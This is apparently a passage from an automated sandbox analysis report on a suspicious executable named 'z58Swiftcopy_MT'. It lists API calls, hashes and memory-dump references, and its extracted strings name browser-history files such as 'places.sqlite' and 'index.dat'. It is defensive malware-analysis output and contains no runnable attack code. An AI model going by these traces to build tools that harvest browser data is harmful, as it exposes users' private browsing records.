                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1355100292-0
                                                                                                                                                                                                                                      • Opcode ID: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                                                                                                                                                                                      • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                                                                                                                                                                                                        • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                                                                                                                                                                                                        • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                                                                                                                                                                                                        • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403A55
                                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                                                                                                                                                        • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                                                                                        • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                                                                                                                                        • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                                                                                                                                        • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memsetwcscatwcslen$free$AttributesFilememcpywcscpy
                                                                                                                                                                                                                                      • String ID: history.dat$places.sqlite
                                                                                                                                                                                                                                      • API String ID: 2641622041-467022611
                                                                                                                                                                                                                                      • Opcode ID: 4ee3c1f855ed567974f8c38ae52f347571c4e2ef0f255528624b3fdde4aab0c5
                                                                                                                                                                                                                                      • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4ee3c1f855ed567974f8c38ae52f347571c4e2ef0f255528624b3fdde4aab0c5
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                                                                                                                                                                        • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                                                                                                                                                                                                        • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                                                                                                                                                                                                      • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00417627
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ErrorLast$File$PointerRead
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 839530781-0
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FileFindFirst
                                                                                                                                                                                                                                      • String ID: *.*$index.dat
                                                                                                                                                                                                                                      • API String ID: 1974802433-2863569691
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 004175A2
                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 004175A8
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ErrorLast$FilePointer
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1156039329-0
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                                                                                                                                                      • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                                                                                                                                      • CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: File$CloseCreateHandleTime
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3397143404-0
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                                                                                                                                                      • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                                                                                                                                      • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Temp$DirectoryFileNamePathWindows
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1125800050-0
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000064), ref: 004175D0
                                                                                                                                                                                                                                      • CloseHandle.KERNELBASE(?,00000000,00000000,0045DBC0,00417C24,00000008,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CloseHandleSleep
                                                                                                                                                                                                                                      • String ID: }A
                                                                                                                                                                                                                                      • API String ID: 252777609-2138825249
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • malloc.MSVCRT ref: 00409A10
                                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                                                                                                                                                                                                                      • free.MSVCRT ref: 00409A31
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: freemallocmemcpy
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3056473165-0
                                                                                                                                                                                                                                      • Opcode ID: 4a52a1335cfde8b1ca48f25083a26fca5b2b00b674d395485fb9b1b856b8e911
                                                                                                                                                                                                                                      • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4a52a1335cfde8b1ca48f25083a26fca5b2b00b674d395485fb9b1b856b8e911
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: d
                                                                                                                                                                                                                                      • API String ID: 0-2564639436
                                                                                                                                                                                                                                      • Opcode ID: 9081757c99ca3a842b21ef208fcf0aba28da60ac56b45099a1a2f4719e1e1e22
                                                                                                                                                                                                                                      • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9081757c99ca3a842b21ef208fcf0aba28da60ac56b45099a1a2f4719e1e1e22
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memset
                                                                                                                                                                                                                                      • String ID: BINARY
                                                                                                                                                                                                                                      • API String ID: 2221118986-907554435
                                                                                                                                                                                                                                      • Opcode ID: befda4f382f52914571534526ddb8b998123412eb8d39833d396fd974aa134d0
                                                                                                                                                                                                                                      • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: befda4f382f52914571534526ddb8b998123412eb8d39833d396fd974aa134d0
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _wcsicmp
                                                                                                                                                                                                                                      • String ID: /stext
                                                                                                                                                                                                                                      • API String ID: 2081463915-3817206916
                                                                                                                                                                                                                                      • Opcode ID: 43183885e7d34794edc347ee746a2fdce482efa4a93d67cd5162a7f7a47e1933
                                                                                                                                                                                                                                      • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 43183885e7d34794edc347ee746a2fdce482efa4a93d67cd5162a7f7a47e1933
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _wcsicmp
                                                                                                                                                                                                                                      • String ID: .-v
                                                                                                                                                                                                                                      • API String ID: 2081463915-2160125050
                                                                                                                                                                                                                                      • Opcode ID: d19f359b0b47db267e5fce9c2c3eaec783a9e0147a5c7e9f99ecd470ce03f4be
                                                                                                                                                                                                                                      • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d19f359b0b47db267e5fce9c2c3eaec783a9e0147a5c7e9f99ecd470ce03f4be
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                                                                                                                                        • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                                                                                                                                                                        • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                                                        • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                                                                                                                                                                                                        • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                                                                                                                                                                                                      • CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                                                                                                                                                        • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,0040AFD7,00000000,0040B608), ref: 0040B052
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2445788494-0
                                                                                                                                                                                                                                      • Opcode ID: ce69b7b2c0806108a5f6ddf8d326ed6ca623e0dd1ad04f3d7ca3aacd8c235aa4
                                                                                                                                                                                                                                      • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ce69b7b2c0806108a5f6ddf8d326ed6ca623e0dd1ad04f3d7ca3aacd8c235aa4
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • failed to allocate %u bytes of memory, xrefs: 004152F0
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: malloc
                                                                                                                                                                                                                                      • String ID: failed to allocate %u bytes of memory
                                                                                                                                                                                                                                      • API String ID: 2803490479-1168259600
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0041BDDF
                                                                                                                                                                                                                                      • memcmp.MSVCRT(00001388,?,00000010,?,00000065,00000065,?,?,?,?,?,0041F1B4,?,00000065,004381DF,00000065), ref: 0041BDF1
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcmpmemset
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1065087418-0
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,?,?,?,?,00000000,?,?,00000001,00000000,?,00000000), ref: 00406E09
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00406E5A
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpy$??2@
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3700833809-0
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040ECF9
                                                                                                                                                                                                                                        • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040EDC0
                                                                                                                                                                                                                                      • GetStdHandle.KERNEL32(000000F5,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00410530
                                                                                                                                                                                                                                      • CloseHandle.KERNELBASE(00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00410654
                                                                                                                                                                                                                                        • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
                                                                                                                                                                                                                                        • Part of subcall function 0040973C: GetLastError.KERNEL32(00000000,?,00410669,00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00409750
                                                                                                                                                                                                                                        • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                                                                                                                                                                                                        • Part of subcall function 0040973C: MessageBoxW.USER32(00000000,?,Error,00000030), ref: 00409796
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1381354015-0
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004301AD
                                                                                                                                                                                                                                      • memcpy.MSVCRT(000001A8,?,00000020,?,00000000,00000000,00443DCE,00000000,00000000,00000000,?,00445FAE,?), ref: 004301CD
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpymemset
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1297977491-0
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: free
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1294909896-0
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                                                                                                                                                                                                        • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                                                                                                                                                        • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                                                                                                                                        • Part of subcall function 0040A02C: CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                                                                                                                                                                      • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
